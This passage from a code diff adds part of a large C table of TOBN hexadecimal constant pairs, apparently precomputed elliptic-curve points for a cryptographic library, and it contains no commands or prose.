+     TOBN(0xcdba941f, 0x8761c971), TOBN(0x1550518b, 0xa3be4a5d),
+     TOBN(0xd0e8e2f0, 0x57d0b70c), TOBN(0xeea8612e, 0xcd133ba3),
+     TOBN(0x814670f0, 0x44416aec), TOBN(0x424db6c3, 0x30775061),
+     TOBN(0xd96039d1, 0x16213fd1), TOBN(0xc61e7fa5, 0x18a3478f),
+     TOBN(0xa805bdcc, 0xcb0c5021), TOBN(0xbdd6f3a8, 0x0cc616dd),
+     TOBN(0x06009667, 0x5d97f7e2), TOBN(0x31db0fc1, 0xaf0bf4b6),
+     TOBN(0x23680ed4, 0x5491627a), TOBN(0xb99a3c66, 0x7d741fb1),
+     TOBN(0xe9bb5f55, 0x36b1ff92), TOBN(0x29738577, 0x512b388d),
+     TOBN(0xdb8a2ce7, 0x50fcf263), TOBN(0x385346d4, 0x6c4f7b47),
+     TOBN(0xbe86c5ef, 0x31631f9e), TOBN(0xbf91da21, 0x03a57a29),
+     TOBN(0xc3b1f796, 0x7b23f821), TOBN(0x0f7d00d2, 0x770db354),
+     TOBN(0x8ffc6c3b, 0xd8fe79da), TOBN(0xcc5e8c40, 0xd525c996),
+     TOBN(0x4640991d, 0xcfff632a), TOBN(0x64d97e8c, 0x67112528),
+     TOBN(0xc232d973, 0x02f1cd1e), TOBN(0xce87eacb, 0x1dd212a4),
+     TOBN(0x6e4c8c73, 0xe69802f7), TOBN(0x12ef0290, 0x1fffddbd),
+     TOBN(0x941ec74e, 0x1bcea6e2), TOBN(0xd0b54024, 0x3cb92cbb),
+     TOBN(0x809fb9d4, 0x7e8f9d05), TOBN(0x3bf16159, 0xf2992aae),
+     TOBN(0xad40f279, 0xf8a7a838), TOBN(0x11aea631, 0x05615660),
+     TOBN(0xbf52e6f1, 0xa01f6fa1), TOBN(0xef046995, 0x3dc2aec9),
+     TOBN(0x785dbec9, 0xd8080711), TOBN(0xe1aec60a, 0x9fdedf76),
+     TOBN(0xece797b5, 0xfa21c126), TOBN(0xc66e898f, 0x05e52732),
+     TOBN(0x39bb69c4, 0x08811fdb), TOBN(0x8bfe1ef8, 0x2fc7f082),
+     TOBN(0xc8e7a393, 0x174f4138), TOBN(0xfba8ad1d, 0xd58d1f98),
+     TOBN(0xbc21d0ce, 0xbfd2fd5b), TOBN(0x0b839a82, 0x6ee60d61),
+     TOBN(0xaacf7658, 0xafd22253), TOBN(0xb526bed8, 0xaae396b3),
+     TOBN(0xccc1bbc2, 0x38564464), TOBN(0x9e3ff947, 0x8c45bc73),
+     TOBN(0xcde9bca3, 0x58188a78), TOBN(0x138b8ee0, 0xd73bf8f7),
+     TOBN(0x5c7e234c, 0x4123c489), TOBN(0x66e69368, 0xfa643297),
+     TOBN(0x0629eeee, 0x39a15fa3), TOBN(0x95fab881, 0xa9e2a927),
+     TOBN(0xb2497007, 0xeafbb1e1), TOBN(0xd75c9ce6, 0xe75b7a93),
+     TOBN(0x3558352d, 0xefb68d78), TOBN(0xa2f26699, 0x223f6396),
+     TOBN(0xeb911ecf, 0xe469b17a), TOBN(0x62545779, 0xe72d3ec2),
+     TOBN(0x8ea47de7, 0x82cb113f), TOBN(0xebe4b086, 0x4e1fa98d),
+     TOBN(0xec2d5ed7, 0x8cdfedb1), TOBN(0xa535c077, 0xfe211a74),
+     TOBN(0x9678109b, 0x11d244c5), TOBN(0xf17c8bfb, 0xbe299a76),
+     TOBN(0xb651412e, 0xfb11fbc4), TOBN(0xea0b5482, 0x94ab3f65),
+     TOBN(0xd8dffd95, 0x0cf78243), TOBN(0x2e719e57, 0xce0361d4),
+     TOBN(0x9007f085, 0x304ddc5b), TOBN(0x095e8c6d, 0x4daba2ea),
+     TOBN(0x5a33cdb4, 0x3f9d28a9), TOBN(0x85b95cd8, 0xe2283003),
+     TOBN(0xbcd6c819, 0xb9744733), TOBN(0x29c5f538, 0xfc7f5783),
+     TOBN(0x6c49b2fa, 0xd59038e4), TOBN(0x68349cc1, 0x3bbe1018),
+     TOBN(0xcc490c1d, 0x21830ee5), TOBN(0x36f9c4ee, 0xe9bfa297),
+     TOBN(0x58fd7294, 0x48de1a94), TOBN(0xaadb13a8, 0x4e8f2cdc),
+     TOBN(0x515eaaa0, 0x81313dba), TOBN(0xc76bb468, 0xc2152dd8),
+     TOBN(0x357f8d75, 0xa653dbf8), TOBN(0xe4d8c4d1, 0xb14ac143),
+     TOBN(0xbdb8e675, 0xb055cb40), TOBN(0x898f8e7b, 0x977b5167),
+     TOBN(0xecc65651, 0xb82fb863), TOBN(0x56544814, 0x6d88f01f),
+     TOBN(0xb0928e95, 0x263a75a9), TOBN(0xcfb6836f, 0x1a22fcda),
+     TOBN(0x651d14db, 0x3f3bd37c), TOBN(0x1d3837fb, 0xb6ad4664),
+     TOBN(0x7c5fb538, 0xff4f94ab), TOBN(0x7243c712, 0x6d7fb8f2),
+     TOBN(0xef13d60c, 0xa85c5287), TOBN(0x18cfb7c7, 0x4bb8dd1b),
+     TOBN(0x82f9bfe6, 0x72908219), TOBN(0x35c4592b, 0x9d5144ab),
+     TOBN(0x52734f37, 0x9cf4b42f), TOBN(0x6bac55e7, 0x8c60ddc4),
+     TOBN(0xb5cd811e, 0x94dea0f6), TOBN(0x259ecae4, 0xe18cc1a3),
+     TOBN(0x6a0e836e, 0x15e660f8), TOBN(0x6c639ea6, 0x0e02bff2),
+     TOBN(0x8721b8cb, 0x7e1026fd), TOBN(0x9e73b50b, 0x63261942),
+     TOBN(0xb8c70974, 0x77f01da3), TOBN(0x1839e6a6, 0x8268f57f),
+     TOBN(0x571b9415, 0x5150b805), TOBN(0x1892389e, 0xf92c7097),
+     TOBN(0x8d69c18e, 0x4a084b95), TOBN(0x7014c512, 0xbe5b495c),
+     TOBN(0x4780db36, 0x1b07523c), TOBN(0x2f6219ce, 0x2c1c64fa),
+     TOBN(0xc38b81b0, 0x602c105a), TOBN(0xab4f4f20, 0x5dc8e360),
+     TOBN(0x20d3c982, 0xcf7d62d2), TOBN(0x1f36e29d, 0x23ba8150),
+     TOBN(0x48ae0bf0, 0x92763f9e), TOBN(0x7a527e6b, 0x1d3a7007),
+     TOBN(0xb4a89097, 0x581a85e3), TOBN(0x1f1a520f, 0xdc158be5),
+     TOBN(0xf98db37d, 0x167d726e), TOBN(0x8802786e, 0x1113e862)}
+    ,
+    {TOBN(0xefb2149e, 0x36f09ab0), TOBN(0x03f163ca, 0x4a10bb5b),
+     TOBN(0xd0297045, 0x06e20998), TOBN(0x56f0af00, 0x1b5a3bab),
+     TOBN(0x7af4cfec, 0x70880e0d), TOBN(0x7332a66f, 0xbe3d913f),
+     TOBN(0x32e6c84a, 0x7eceb4bd), TOBN(0xedc4a79a, 0x9c228f55),
+     TOBN(0xc37c7dd0, 0xc55c4496), TOBN(0xa6a96357, 0x25bbabd2),
+     TOBN(0x5b7e63f2, 0xadd7f363), TOBN(0x9dce3782, 0x2e73f1df),
+     TOBN(0xe1e5a16a, 0xb2b91f71), TOBN(0xe4489823, 0x5ba0163c),
+     TOBN(0xf2759c32, 0xf6e515ad), TOBN(0xa5e2f1f8, 0x8615eecf),
+     TOBN(0x74519be7, 0xabded551), TOBN(0x03d358b8, 0xc8b74410),
+     TOBN(0x4d00b10b, 0x0e10d9a9), TOBN(0x6392b0b1, 0x28da52b7),
+     TOBN(0x6744a298, 0x0b75c904), TOBN(0xc305b0ae, 0xa8f7f96c),
+     TOBN(0x042e421d, 0x182cf932), TOBN(0xf6fc5d50, 0x9e4636ca),
+     TOBN(0x795847c9, 0xd64cc78c), TOBN(0x6c50621b, 0x9b6cb27b),
+     TOBN(0x07099bf8, 0xdf8022ab), TOBN(0x48f862eb, 0xc04eda1d),
+     TOBN(0xd12732ed, 0xe1603c16), TOBN(0x19a80e0f, 0x5c9a9450),
+     TOBN(0xe2257f54, 0xb429b4fc), TOBN(0x66d3b2c6, 0x45460515),
+     TOBN(0x6ca4f87e, 0x822e37be), TOBN(0x73f237b4, 0x253bda4e),
+     TOBN(0xf747f3a2, 0x41190aeb), TOBN(0xf06fa36f, 0x804cf284),
+     TOBN(0x0a6bbb6e, 0xfc621c12), TOBN(0x5d624b64, 0x40b80ec6),
+     TOBN(0x4b072425, 0x7ba556f3), TOBN(0x7fa0c354, 0x3e2d20a8),
+     TOBN(0xe921fa31, 0xe3229d41), TOBN(0xa929c652, 0x94531bd4),
+     TOBN(0x84156027, 0xa6d38209), TOBN(0xf3d69f73, 0x6bdb97bd),
+     TOBN(0x8906d19a, 0x16833631), TOBN(0x68a34c2e, 0x03d51be3),
+     TOBN(0xcb59583b, 0x0e511cd8), TOBN(0x99ce6bfd, 0xfdc132a8),
+     TOBN(0x3facdaaa, 0xffcdb463), TOBN(0x658bbc1a, 0x34a38b08),
+     TOBN(0x12a801f8, 0xf1a9078d), TOBN(0x1567bcf9, 0x6ab855de),
+     TOBN(0xe08498e0, 0x3572359b), TOBN(0xcf0353e5, 0x8659e68b),
+     TOBN(0xbb86e9c8, 0x7d23807c), TOBN(0xbc08728d, 0x2198e8a2),
+     TOBN(0x8de2b7bc, 0x453cadd6), TOBN(0x203900a7, 0xbc0bc1f8),
+     TOBN(0xbcd86e47, 0xa6abd3af), TOBN(0x911cac12, 0x8502effb),
+     TOBN(0x2d550242, 0xec965469), TOBN(0x0e9f7692, 0x29e0017e),
+     TOBN(0x633f078f, 0x65979885), TOBN(0xfb87d449, 0x4cf751ef),
+     TOBN(0xe1790e4b, 0xfc25419a), TOBN(0x36467203, 0x4bff3cfd),
+     TOBN(0xc8db6386, 0x25b6e83f), TOBN(0x6cc69f23, 0x6cad6fd2),
+     TOBN(0x0219e45a, 0x6bc68bb9), TOBN(0xe43d79b6, 0x297f7334),
+     TOBN(0x7d445368, 0x465dc97c), TOBN(0x4b9eea32, 0x2a0b949a),
+     TOBN(0x1b96c6ba, 0x6102d021), TOBN(0xeaafac78, 0x2f4461ea),
+     TOBN(0xd4b85c41, 0xc49f19a8), TOBN(0x275c28e4, 0xcf538875),
+     TOBN(0x35451a9d, 0xdd2e54e0), TOBN(0x6991adb5, 0x0605618b),
+     TOBN(0x5b8b4bcd, 0x7b36cd24), TOBN(0x372a4f8c, 0x56f37216),
+     TOBN(0xc890bd73, 0xa6a5da60), TOBN(0x6f083da0, 0xdc4c9ff0),
+     TOBN(0xf4e14d94, 0xf0536e57), TOBN(0xf9ee1eda, 0xaaec8243),
+     TOBN(0x571241ec, 0x8bdcf8e7), TOBN(0xa5db8271, 0x0b041e26),
+     TOBN(0x9a0b9a99, 0xe3fff040), TOBN(0xcaaf21dd, 0x7c271202),
+     TOBN(0xb4e2b2e1, 0x4f0dd2e8), TOBN(0xe77e7c4f, 0x0a377ac7),
+     TOBN(0x69202c3f, 0x0d7a2198), TOBN(0xf759b7ff, 0x28200eb8),
+     TOBN(0xc87526ed, 0xdcfe314e), TOBN(0xeb84c524, 0x53d5cf99),
+     TOBN(0xb1b52ace, 0x515138b6), TOBN(0x5aa7ff8c, 0x23fca3f4),
+     TOBN(0xff0b13c3, 0xb9791a26), TOBN(0x960022da, 0xcdd58b16),
+     TOBN(0xdbd55c92, 0x57aad2de), TOBN(0x3baaaaa3, 0xf30fe619),
+     TOBN(0x9a4b2346, 0x0d881efd), TOBN(0x506416c0, 0x46325e2a),
+     TOBN(0x91381e76, 0x035c18d4), TOBN(0xb3bb68be, 0xf27817b0),
+     TOBN(0x15bfb8bf, 0x5116f937), TOBN(0x7c64a586, 0xc1268943),
+     TOBN(0x71e25cc3, 0x8419a2c8), TOBN(0x9fd6b0c4, 0x8335f463),
+     TOBN(0x4bf0ba3c, 0xe8ee0e0e), TOBN(0x6f6fba60, 0x298c21fa),
+     TOBN(0x57d57b39, 0xae66bee0), TOBN(0x292d5130, 0x22672544),
+     TOBN(0xf451105d, 0xbab093b3), TOBN(0x012f59b9, 0x02839986),
+     TOBN(0x8a915802, 0x3474a89c), TOBN(0x048c919c, 0x2de03e97),
+     TOBN(0xc476a2b5, 0x91071cd5), TOBN(0x791ed89a, 0x034970a5),
+     TOBN(0x89bd9042, 0xe1b7994b), TOBN(0x8eaf5179, 0xa1057ffd),
+     TOBN(0x6066e2a2, 0xd551ee10), TOBN(0x87a8f1d8, 0x727e09a6),
+     TOBN(0x00d08bab, 0x2c01148d), TOBN(0x6da8e4f1, 0x424f33fe),
+     TOBN(0x466d17f0, 0xcf9a4e71), TOBN(0xff502010, 0x3bf5cb19),
+     TOBN(0xdccf97d8, 0xd062ecc0), TOBN(0x80c0d9af, 0x81d80ac4),
+     TOBN(0xe87771d8, 0x033f2876), TOBN(0xb0186ec6, 0x7d5cc3db),
+     TOBN(0x58e8bb80, 0x3bc9bc1d), TOBN(0x4d1395cc, 0x6f6ef60e),
+     TOBN(0xa73c62d6, 0x186244a0), TOBN(0x918e5f23, 0x110a5b53),
+     TOBN(0xed4878ca, 0x741b7eab), TOBN(0x3038d71a, 0xdbe03e51),
+     TOBN(0x840204b7, 0xa93c3246), TOBN(0x21ab6069, 0xa0b9b4cd),
+     TOBN(0xf5fa6e2b, 0xb1d64218), TOBN(0x1de6ad0e, 0xf3d56191),
+     TOBN(0x570aaa88, 0xff1929c7), TOBN(0xc6df4c6b, 0x640e87b5),
+     TOBN(0xde8a74f2, 0xc65f0ccc), TOBN(0x8b972fd5, 0xe6f6cc01),
+     TOBN(0x3fff36b6, 0x0b846531), TOBN(0xba7e45e6, 0x10a5e475),
+     TOBN(0x84a1d10e, 0x4145b6c5), TOBN(0xf1f7f91a, 0x5e046d9d),
+     TOBN(0x0317a692, 0x44de90d7), TOBN(0x951a1d4a, 0xf199c15e),
+     TOBN(0x91f78046, 0xc9d73deb), TOBN(0x74c82828, 0xfab8224f),
+     TOBN(0xaa6778fc, 0xe7560b90), TOBN(0xb4073e61, 0xa7e824ce),
+     TOBN(0xff0d693c, 0xd642eba8), TOBN(0x7ce2e57a, 0x5dccef38),
+     TOBN(0x89c2c789, 0x1df1ad46), TOBN(0x83a06922, 0x098346fd),
+     TOBN(0x2d715d72, 0xda2fc177), TOBN(0x7b6dd71d, 0x85b6cf1d),
+     TOBN(0xc60a6d0a, 0x73fa9cb0), TOBN(0xedd3992e, 0x328bf5a9),
+     TOBN(0xc380ddd0, 0x832c8c82), TOBN(0xd182d410, 0xa2a0bf50),
+     TOBN(0x7d9d7438, 0xd9a528db), TOBN(0xe8b1a0e9, 0xcaf53994),
+     TOBN(0xddd6e5fe, 0x0e19987c), TOBN(0xacb8df03, 0x190b059d),
+     TOBN(0x53703a32, 0x8300129f), TOBN(0x1f637662, 0x68c43bfd),
+     TOBN(0xbcbd1913, 0x00e54051), TOBN(0x812fcc62, 0x7bf5a8c5),
+     TOBN(0x3f969d5f, 0x29fb85da), TOBN(0x72f4e00a, 0x694759e8),
+     TOBN(0x426b6e52, 0x790726b7), TOBN(0x617bbc87, 0x3bdbb209),
+     TOBN(0x511f8bb9, 0x97aee317), TOBN(0x812a4096, 0xe81536a8),
+     TOBN(0x137dfe59, 0x3ac09b9b), TOBN(0x0682238f, 0xba8c9a7a),
+     TOBN(0x7072ead6, 0xaeccb4bd), TOBN(0x6a34e9aa, 0x692ba633),
+     TOBN(0xc82eaec2, 0x6fff9d33), TOBN(0xfb753512, 0x1d4d2b62),
+     TOBN(0x1a0445ff, 0x1d7aadab), TOBN(0x65d38260, 0xd5f6a67c),
+     TOBN(0x6e62fb08, 0x91cfb26f), TOBN(0xef1e0fa5, 0x5c7d91d6),
+     TOBN(0x47e7c7ba, 0x33db72cd), TOBN(0x017cbc09, 0xfa7c74b2),
+     TOBN(0x3c931590, 0xf50a503c), TOBN(0xcac54f60, 0x616baa42),
+     TOBN(0x9b6cd380, 0xb2369f0f), TOBN(0x97d3a70d, 0x23c76151),
+     TOBN(0x5f9dd6fc, 0x9862a9c6), TOBN(0x044c4ab2, 0x12312f51),
+     TOBN(0x035ea0fd, 0x834a2ddc), TOBN(0x49e6b862, 0xcc7b826d),
+     TOBN(0xb03d6883, 0x62fce490), TOBN(0x62f2497a, 0xb37e36e9),
+     TOBN(0x04b005b6, 0xc6458293), TOBN(0x36bb5276, 0xe8d10af7),
+     TOBN(0xacf2dc13, 0x8ee617b8), TOBN(0x470d2d35, 0xb004b3d4),
+     TOBN(0x06790832, 0xfeeb1b77), TOBN(0x2bb75c39, 0x85657f9c),
+     TOBN(0xd70bd4ed, 0xc0f60004), TOBN(0xfe797ecc, 0x219b018b),
+     TOBN(0x9b5bec2a, 0x753aebcc), TOBN(0xdaf9f3dc, 0xc939eca5),
+     TOBN(0xd6bc6833, 0xd095ad09), TOBN(0x98abdd51, 0xdaa4d2fc),
+     TOBN(0xd9840a31, 0x8d168be5), TOBN(0xcf7c10e0, 0x2325a23c),
+     TOBN(0xa5c02aa0, 0x7e6ecfaf), TOBN(0x2462e7e6, 0xb5bfdf18),
+     TOBN(0xab2d8a8b, 0xa0cc3f12), TOBN(0x68dd485d, 0xbc672a29),
+     TOBN(0x72039752, 0x596f2cd3), TOBN(0x5d3eea67, 0xa0cf3d8d),
+     TOBN(0x810a1a81, 0xe6602671), TOBN(0x8f144a40, 0x14026c0c),
+     TOBN(0xbc753a6d, 0x76b50f85), TOBN(0xc4dc21e8, 0x645cd4a4),
+     TOBN(0xc5262dea, 0x521d0378), TOBN(0x802b8e0e, 0x05011c6f),
+     TOBN(0x1ba19cbb, 0x0b4c19ea), TOBN(0x21db64b5, 0xebf0aaec),
+     TOBN(0x1f394ee9, 0x70342f9d), TOBN(0x93a10aee, 0x1bc44a14),
+     TOBN(0xa7eed31b, 0x3efd0baa), TOBN(0x6e7c824e, 0x1d154e65),
+     TOBN(0xee23fa81, 0x9966e7ee), TOBN(0x64ec4aa8, 0x05b7920d),
+     TOBN(0x2d44462d, 0x2d90aad4), TOBN(0xf44dd195, 0xdf277ad5),
+     TOBN(0x8d6471f1, 0xbb46b6a1), TOBN(0x1e65d313, 0xfd885090),
+     TOBN(0x33a800f5, 0x13a977b4), TOBN(0xaca9d721, 0x0797e1ef),
+     TOBN(0x9a5a85a0, 0xfcff6a17), TOBN(0x9970a3f3, 0x1eca7cee),
+     TOBN(0xbb9f0d6b, 0xc9504be3), TOBN(0xe0c504be, 0xadd24ee2),
+     TOBN(0x7e09d956, 0x77fcc2f4), TOBN(0xef1a5227, 0x65bb5fc4),
+     TOBN(0x145d4fb1, 0x8b9286aa), TOBN(0x66fd0c5d, 0x6649028b),
+     TOBN(0x98857ceb, 0x1bf4581c), TOBN(0xe635e186, 0xaca7b166),
+     TOBN(0x278ddd22, 0x659722ac), TOBN(0xa0903c4c, 0x1db68007),
+     TOBN(0x366e4589, 0x48f21402), TOBN(0x31b49c14, 0xb96abda2),
+     TOBN(0x329c4b09, 0xe0403190), TOBN(0x97197ca3, 0xd29f43fe),
+     TOBN(0x8073dd1e, 0x274983d8), TOBN(0xda1a3bde, 0x55717c8f),
+     TOBN(0xfd3d4da2, 0x0361f9d1), TOBN(0x1332d081, 0x4c7de1ce),
+     TOBN(0x9b7ef7a3, 0xaa6d0e10), TOBN(0x17db2e73, 0xf54f1c4a),
+     TOBN(0xaf3dffae, 0x4cd35567), TOBN(0xaaa2f406, 0xe56f4e71),
+     TOBN(0x8966759e, 0x7ace3fc7), TOBN(0x9594eacf, 0x45a8d8c6),
+     TOBN(0x8de3bd8b, 0x91834e0e), TOBN(0xafe4ca53, 0x548c0421),
+     TOBN(0xfdd7e856, 0xe6ee81c6), TOBN(0x8f671beb, 0x6b891a3a),
+     TOBN(0xf7a58f2b, 0xfae63829), TOBN(0x9ab186fb, 0x9c11ac9f),
+     TOBN(0x8d6eb369, 0x10b5be76), TOBN(0x046b7739, 0xfb040bcd),
+     TOBN(0xccb4529f, 0xcb73de88), TOBN(0x1df0fefc, 0xcf26be03),
+     TOBN(0xad7757a6, 0xbcfcd027), TOBN(0xa8786c75, 0xbb3165ca),
+     TOBN(0xe9db1e34, 0x7e99a4d9), TOBN(0x99ee86df, 0xb06c504b),
+     TOBN(0x5b7c2ddd, 0xc15c9f0a), TOBN(0xdf87a734, 0x4295989e),
+     TOBN(0x59ece47c, 0x03d08fda), TOBN(0xb074d3dd, 0xad5fc702),
+     TOBN(0x20407903, 0x51a03776), TOBN(0x2bb1f77b, 0x2a608007),
+     TOBN(0x25c58f4f, 0xe1153185), TOBN(0xe6df62f6, 0x766e6447),
+     TOBN(0xefb3d1be, 0xed51275a), TOBN(0x5de47dc7, 0x2f0f483f),
+     TOBN(0x7932d98e, 0x97c2bedf), TOBN(0xd5c11927, 0x0219f8a1),
+     TOBN(0x9d751200, 0xa73a294e), TOBN(0x5f88434a, 0x9dc20172),
+     TOBN(0xd28d9fd3, 0xa26f506a), TOBN(0xa890cd31, 0x9d1dcd48),
+     TOBN(0x0aebaec1, 0x70f4d3b4), TOBN(0xfd1a1369, 0x0ffc8d00),
+     TOBN(0xb9d9c240, 0x57d57838), TOBN(0x45929d26, 0x68bac361),
+     TOBN(0x5a2cd060, 0x25b15ca6), TOBN(0x4b3c83e1, 0x6e474446),
+     TOBN(0x1aac7578, 0xee1e5134), TOBN(0xa418f5d6, 0xc91e2f41),
+     TOBN(0x6936fc8a, 0x213ed68b), TOBN(0x860ae7ed, 0x510a5224),
+     TOBN(0x63660335, 0xdef09b53), TOBN(0x641b2897, 0xcd79c98d),
+     TOBN(0x29bd38e1, 0x01110f35), TOBN(0x79c26f42, 0x648b1937),
+     TOBN(0x64dae519, 0x9d9164f4), TOBN(0xd85a2310, 0x0265c273),
+     TOBN(0x7173dd5d, 0x4b07e2b1), TOBN(0xd144c4cb, 0x8d9ea221),
+     TOBN(0xe8b04ea4, 0x1105ab14), TOBN(0x92dda542, 0xfe80d8f1),
+     TOBN(0xe9982fa8, 0xcf03dce6), TOBN(0x8b5ea965, 0x1a22cffc),
+     TOBN(0xf7f4ea7f, 0x3fad88c4), TOBN(0x62db773e, 0x6a5ba95c),
+     TOBN(0xd20f02fb, 0x93f24567), TOBN(0xfd46c69a, 0x315257ca),
+     TOBN(0x0ac74cc7, 0x8bcab987), TOBN(0x46f31c01, 0x5ceca2f5),
+     TOBN(0x40aedb59, 0x888b219e), TOBN(0xe50ecc37, 0xe1fccd02),
+     TOBN(0x1bcd9dad, 0x911f816c), TOBN(0x583cc1ec, 0x8db9b00c),
+     TOBN(0xf3cd2e66, 0xa483bf11), TOBN(0xfa08a6f5, 0xb1b2c169),
+     TOBN(0xf375e245, 0x4be9fa28), TOBN(0x99a7ffec, 0x5b6d011f),
+     TOBN(0x6a3ebddb, 0xc4ae62da), TOBN(0x6cea00ae, 0x374aef5d),
+     TOBN(0xab5fb98d, 0x9d4d05bc), TOBN(0x7cba1423, 0xd560f252),
+     TOBN(0x49b2cc21, 0x208490de), TOBN(0x1ca66ec3, 0xbcfb2879),
+     TOBN(0x7f1166b7, 0x1b6fb16f), TOBN(0xfff63e08, 0x65fe5db3),
+     TOBN(0xb8345abe, 0x8b2610be), TOBN(0xb732ed80, 0x39de3df4),
+     TOBN(0x0e24ed50, 0x211c32b4), TOBN(0xd10d8a69, 0x848ff27d),
+     TOBN(0xc1074398, 0xed4de248), TOBN(0xd7cedace, 0x10488927),
+     TOBN(0xa4aa6bf8, 0x85673e13), TOBN(0xb46bae91, 0x6daf30af),
+     TOBN(0x07088472, 0xfcef7ad8), TOBN(0x61151608, 0xd4b35e97),
+     TOBN(0xbcfe8f26, 0xdde29986), TOBN(0xeb84c4c7, 0xd5a34c79),
+     TOBN(0xc1eec55c, 0x164e1214), TOBN(0x891be86d, 0xa147bb03),
+     TOBN(0x9fab4d10, 0x0ba96835), TOBN(0xbf01e9b8, 0xa5c1ae9f),
+     TOBN(0x6b4de139, 0xb186ebc0), TOBN(0xd5c74c26, 0x85b91bca),
+     TOBN(0x5086a99c, 0xc2d93854), TOBN(0xeed62a7b, 0xa7a9dfbc),
+     TOBN(0x8778ed6f, 0x76b7618a), TOBN(0xbff750a5, 0x03b66062),
+     TOBN(0x4cb7be22, 0xb65186db), TOBN(0x369dfbf0, 0xcc3a6d13),
+     TOBN(0xc7dab26c, 0x7191a321), TOBN(0x9edac3f9, 0x40ed718e),
+     TOBN(0xbc142b36, 0xd0cfd183), TOBN(0xc8af82f6, 0x7c991693),
+     TOBN(0xb3d1e4d8, 0x97ce0b2a), TOBN(0xe6d7c87f, 0xc3a55cdf),
+     TOBN(0x35846b95, 0x68b81afe), TOBN(0x018d12af, 0xd3c239d8),
+     TOBN(0x2b2c6208, 0x01206e15), TOBN(0xe0e42453, 0xa3b882c6),
+     TOBN(0x854470a3, 0xa50162d5), TOBN(0x08157478, 0x7017a62a),
+     TOBN(0x18bd3fb4, 0x820357c7), TOBN(0x992039ae, 0x6f1458ad),
+     TOBN(0x9a1df3c5, 0x25b44aa1), TOBN(0x2d780357, 0xed3d5281),
+     TOBN(0x58cf7e4d, 0xc77ad4d4), TOBN(0xd49a7998, 0xf9df4fc4),
+     TOBN(0x4465a8b5, 0x1d71205e), TOBN(0xa0ee0ea6, 0x649254aa),
+     TOBN(0x4b5eeecf, 0xab7bd771), TOBN(0x6c873073, 0x35c262b9),
+     TOBN(0xdc5bd648, 0x3c9d61e7), TOBN(0x233d6d54, 0x321460d2),
+     TOBN(0xd20c5626, 0xfc195bcc), TOBN(0x25445958, 0x04d78b63),
+     TOBN(0xe03fcb3d, 0x17ec8ef3), TOBN(0x54b690d1, 0x46b8f781),
+     TOBN(0x82fa2c8a, 0x21230646), TOBN(0xf51aabb9, 0x084f418c),
+     TOBN(0xff4fbec1, 0x1a30ba43), TOBN(0x6a5acf73, 0x743c9df7),
+     TOBN(0x1da2b357, 0xd635b4d5), TOBN(0xc3de68dd, 0xecd5c1da),
+     TOBN(0xa689080b, 0xd61af0dd), TOBN(0xdea5938a, 0xd665bf99),
+     TOBN(0x0231d71a, 0xfe637294), TOBN(0x01968aa6, 0xa5a81cd8),
+     TOBN(0x11252d50, 0x048e63b5), TOBN(0xc446bc52, 0x6ca007e9),
+     TOBN(0xef8c50a6, 0x96d6134b), TOBN(0x9361fbf5, 0x9e09a05c),
+     TOBN(0xf17f85a6, 0xdca3291a), TOBN(0xb178d548, 0xff251a21),
+     TOBN(0x87f6374b, 0xa4df3915), TOBN(0x566ce1bf, 0x2fd5d608),
+     TOBN(0x425cba4d, 0x7de35102), TOBN(0x6b745f8f, 0x58c5d5e2),
+     TOBN(0x88402af6, 0x63122edf), TOBN(0x3190f9ed, 0x3b989a89),
+     TOBN(0x4ad3d387, 0xebba3156), TOBN(0xef385ad9, 0xc7c469a5),
+     TOBN(0xb08281de, 0x3f642c29), TOBN(0x20be0888, 0x910ffb88),
+     TOBN(0xf353dd4a, 0xd5292546), TOBN(0x3f1627de, 0x8377a262),
+     TOBN(0xa5faa013, 0xeefcd638), TOBN(0x8f3bf626, 0x74cc77c3),
+     TOBN(0x32618f65, 0xa348f55e), TOBN(0x5787c0dc, 0x9fefeb9e),
+     TOBN(0xf1673aa2, 0xd9a23e44), TOBN(0x88dfa993, 0x4e10690d),
+     TOBN(0x1ced1b36, 0x2bf91108), TOBN(0x9193ceca, 0x3af48649),
+     TOBN(0xfb34327d, 0x2d738fc5), TOBN(0x6697b037, 0x975fee6c),
+     TOBN(0x2f485da0, 0xc04079a5), TOBN(0x2cdf5735, 0x2feaa1ac),
+     TOBN(0x76944420, 0xbd55659e), TOBN(0x7973e32b, 0x4376090c),
+     TOBN(0x86bb4fe1, 0x163b591a), TOBN(0x10441aed, 0xc196f0ca),
+     TOBN(0x3b431f4a, 0x045ad915), TOBN(0x6c11b437, 0xa4afacb1),
+     TOBN(0x30b0c7db, 0x71fdbbd8), TOBN(0xb642931f, 0xeda65acd),
+     TOBN(0x4baae6e8, 0x9c92b235), TOBN(0xa73bbd0e, 0x6b3993a1),
+     TOBN(0xd06d60ec, 0x693dd031), TOBN(0x03cab91b, 0x7156881c),
+     TOBN(0xd615862f, 0x1db3574b), TOBN(0x485b0185, 0x64bb061a),
+     TOBN(0x27434988, 0xa0181e06), TOBN(0x2cd61ad4, 0xc1c0c757),
+     TOBN(0x3effed5a, 0x2ff9f403), TOBN(0x8dc98d8b, 0x62239029),
+     TOBN(0x2206021e, 0x1f17b70d), TOBN(0xafbec0ca, 0xbf510015),
+     TOBN(0x9fed7164, 0x80130dfa), TOBN(0x306dc2b5, 0x8a02dcf5),
+     TOBN(0x48f06620, 0xfeb10fc0), TOBN(0x78d1e1d5, 0x5a57cf51),
+     TOBN(0xadef8c5a, 0x192ef710), TOBN(0x88afbd4b, 0x3b7431f9),
+     TOBN(0x7e1f7407, 0x64250c9e), TOBN(0x6e31318d, 0xb58bec07),
+     TOBN(0xfd4fc4b8, 0x24f89b4e), TOBN(0x65a5dd88, 0x48c36a2a),
+     TOBN(0x4f1eccff, 0xf024baa7), TOBN(0x22a21cf2, 0xcba94650),
+     TOBN(0x95d29dee, 0x42a554f7), TOBN(0x828983a5, 0x002ec4ba),
+     TOBN(0x8112a1f7, 0x8badb73d), TOBN(0x79ea8897, 0xa27c1839),
+     TOBN(0x8969a5a7, 0xd065fd83), TOBN(0xf49af791, 0xb262a0bc),
+     TOBN(0xfcdea8b6, 0xaf2b5127), TOBN(0x10e913e1, 0x564c2dbc),
+     TOBN(0x51239d14, 0xbc21ef51), TOBN(0xe51c3ceb, 0x4ce57292),
+     TOBN(0x795ff068, 0x47bbcc3b), TOBN(0x86b46e1e, 0xbd7e11e6),
+     TOBN(0x0ea6ba23, 0x80041ef4), TOBN(0xd72fe505, 0x6262342e),
+     TOBN(0x8abc6dfd, 0x31d294d4), TOBN(0xbbe017a2, 0x1278c2c9),
+     TOBN(0xb1fcfa09, 0xb389328a), TOBN(0x322fbc62, 0xd01771b5),
